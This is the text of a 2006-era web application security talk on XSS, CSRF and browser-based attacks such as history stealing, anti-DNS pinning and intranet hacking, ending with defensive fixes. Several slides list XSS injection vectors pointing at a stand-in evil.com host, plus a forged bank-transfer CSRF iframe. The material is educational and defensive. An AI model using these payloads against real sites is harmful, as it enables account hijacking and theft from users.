SlideShare a Scribd company logo
1 of 38
Download to read offline
Rich Web App Security
          Keeping your application safe




Jeremiah Grossman                 Joe Walker
  Founder and CTO                DWR Developer
  WhiteHat Security                Getahead

                                                 1
5 Stages of Web
Application Security Grief
           Denial
           Anger
         Bargaining
         Depression
         Acceptance


                             2
Network security solutions don't
work for web application security

Telnet


 FTP


 POP

                           App Servers
http(s)

            Web Servers
                            Database


                                         3
8 out of 10 Websites
         are
     Vulnerable


                       4
The Victims


The companies that host the Applications
The users that use the Applications




                                           5
Building Blocks: XSS

         XSS = Cross Site Scripting


You are at risk of an XSS attack any time you
 allow scripts from someone untrusted into
           pages from your domain




                                                6
Building Blocks: XSS

You let the user enter their name
Someone is going to enter their name like this:
Joe<script src="evil.com/danger.js">

Then, whoever looks at Joe’s name will execute
Joe’s script and become a slave of Joe




                                                  7
Making User Input Safe


You filter out ‘<script.*>’ and then you’re safe.
Right?




                                                   8
Making User Input Safe

Actually you also need to filter:
<a href='javascript:danger();'>

<body onload='danger();'>

<p style='background-image:
    url("javascript:danger();")');

<img src='javascript:danger()'/>




                                     9
Making User Input Safe
And don’t forget:
<body background="javascript:danger()">

<link rel="stylesheet"
    href="javascript:danger()"/>

<style>@import evil.com/danger.js</style>

<input type='image'
    src='javascript:danger()'/>




                                            10
Making User Input Safe
And then there’s:
<iframe src='evil.com/danger.html'/>

<meta http-equiv="refresh"
content="0;url=javascript:danger()">

<base href="javascript:danger()">

<frameset>
    <frame src="javascript:danger()">...




                                           11
Making User Input Safe

But remember:
<table background="javascript:danger()">

<tr background="javascript:danger()">

<div style="width:expression(danger();)">

<object type="text/x-scriptlet"
    data="evil.com/danger.js">




                                            12
5 Stages of Web
Application Security Grief
           Denial
           Anger
         Bargaining
         Depression
         Acceptance


                             13
Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html" link</a>


makes perfect sense to a browser.



                                               14
Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html">link


makes perfect sense to a browser.



                                               15
Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html >link</a>


makes perfect sense to a browser.



                                               16
Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href="a.html"¾link¼/a¾


makes perfect sense to a browser.



                                               17
Making User Input Safe
And we haven’t got into:
  • Flash (ActionScript ~= JavaScript)
  • SVG (can embed JavaScript)
  • .htc (packaged HTML in IE)
  • XML Data Islands (IE only)
  • HTML+TIME
You can use both <object> and <embed> for many
of these

                                                 18
5 Stages of Web
Application Security Grief
           Denial
           Anger
         Bargaining
         Depression
         Acceptance


                             19
Building Blocks: CSRF

     CSRF = Cross Site Request Forgery


You are at risk of a CSRF attack whenever you
     assume that a request containing an
    authentication header (e.g. cookies) is
         something the user intended



                                                20
Building Blocks: CSRF
          bank.com                   evil.com
                                          .
       Welcome Fred,
       Thank-you for logging in




<iframe width=0 height=0
  src="http://bank.com/transfer.cgi?amnt=all&dest=MrEvil"/>


                                                              21
Building Blocks: CSRF
JavaScript is not always required to exploit a
CSRF hole
Often all you need is:
  <iframe src="dangerous_url">
  or <img src="dangerous_url"/>
  or <script src="dangerous_url">

You can’t use XHR because cross-domain rules
prevent the request from being sent


                                                 22
Attacks only get more
      Effective
70 new new attack techniques in 2006
Many are small, but they combine in worrying
ways
Jeremiah’s Top 10:
  http://jeremiahgrossman.blogspot.com/2006/12/
  top-10-web-hacks-of-2006.html
The 6 most important ...


                                                  23
6. Hacking RSS Readers


              }                        ⇢
                Aggregators generally               Users get
RSS Feeds
                 change the domain                  the result

        Hacking RSS and Atom Feed Implementations
     http://www.cgisecurity.com/papers/HackingFeeds.pdf
                                                                 24
5. Web Worms
If your site that isn’t 100% safe against XSS and CSRF,
users can attack their ‘friends’ with scripts




XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how
email worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

                                                          25
4. Backdooring Media Files

   Many media types are scriptable by design:


   Some are ‘scriptable’ by buffer-overflow:


   If you are allowing users to upload files, be
   afraid.
                     JavaScript Malware embedded in everything
http://jeremiahgrossman.blogspot.com/2006/09/javascript-malware-embedded-in.html

                                                                                   26
3. History Stealing - Part 1
 I want to know if you visit dodgy.com
 I create a page with a link
    and use a script to read the CSS link color:
   purple:guilty, blue:not guilty
 A page can quickly check thousands
   of sites
 http://ha.ckers.org/weird/CSS-history-hack.html



                                                   27
3. History Stealing - Part 2

 Point a script tag at a protected HTML
 resource, detect differing replies by differing
 error messages
 <script src="http://mail.google.com/mail">

 http://ha.ckers.org/weird/javascript-website-login-checker.html




                                                                   28
2. Anti-DNS Pinning
The basic attack:
A browser visits evil.com. The DNS lookup gives the real web-
server address.
1 second later evil.com creates an iframe to the evil.com and
drops the HTTP request
The DNS pin is dropped, the browser needs to look up DNS
again.
This time it gets someone else’s address.
The browser reads from the other site, but thinks it is the same
domain.



                                                                   29
2. Anti-DNS Pinning
As it is the attack isn’t very useful because:
• The browser thinks the domain is evil.com, so
 cookies for innocent.com are not sent, cookie
 protected resources are safe (for now)
• But it’s great for Intranet hacking - no cookies
 are needed to read from 192.168.0.1 or
 127.0.0.1



                                                     30
1. Intranet Hacking
History stealing to enumerate hosts inside the
firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default
passwords, which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf




                                                                                      31
5 Stages of Web
Application Security Grief
           Denial
           Anger
         Bargaining
         Depression
         Acceptance


                             32
Fixing XSS
             (when HTML is Illegal)

1. Filter inputs by white-listing input characters
  Remember to filter header names and values
2. Filter outputs for the display environment
  For HTML:
    &    &amp;    <   &lt;   >   &gt;
     '   &apos;   "   &quot;

  Other environments have other special chars


                                                     33
Fixing XSS
   (when HTML is Legal, and Well Formed)

1. Filter inputs as before
2. Swap characters for entities (as before)
3. Swap back whitelist of allowed tags. e.g.:
  &lt;strong&gt;    <strong>

4. Take extra care over attributes:
  s/&lta href=&quot;([^&]*)&quot;/&gt;/<a href="$1"/>

5. Don’t use regular expressions

                                                           34
Fixing XSS
(when HTML is Legal, and NOT Well Formed)

1. Find another way to do it / Swap jobs / Find
some other solution to the problem
2. Create a tag soup parser to create a DOM
tree from a badly formed HTML document
  Remember to recursively check encodings
3. Create a tree walker that removes all non
approved elements and attributes


                                                  35
Fixing CSRF
Force users to log off
Checking referrer headers doesn’t make things
safe, but it does slow attackers down
Include authentication tokens in the body
  OWASP servlet filter
  Double-submit cookie pattern
       Security Corner: Cross-Site Request Forgeries
    http://shiflett.org/articles/cross-site-request-forgeries

                                                               36
5 Stages of Web
Application Security Grief
           Denial
           Anger
         Bargaining
         Depression
         Acceptance


                             37
Questions?


      Joe Walker                Jeremiah Grossman
http://getahead.org/blog/joe   http://www.whitehatsec.com/

                                                             38

More Related Content

What's hot

Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)Jeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 

What's hot (20)

Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 

Similar to Rich Web App Security - Keeping your application safe

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Aman Singh
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
bh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdfbh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdfcyberhacker7
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Continuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docxContinuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docxrichardnorman90310
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 

Similar to Rich Web App Security - Keeping your application safe (20)

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Xssandcsrf
XssandcsrfXssandcsrf
Xssandcsrf
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
bh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdfbh-usa-07-grossman-WP.pdf
bh-usa-07-grossman-WP.pdf
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Continuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docxContinuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docx
 
Attacking Web Proxies
Attacking Web ProxiesAttacking Web Proxies
Attacking Web Proxies
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 

Recently uploaded

Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
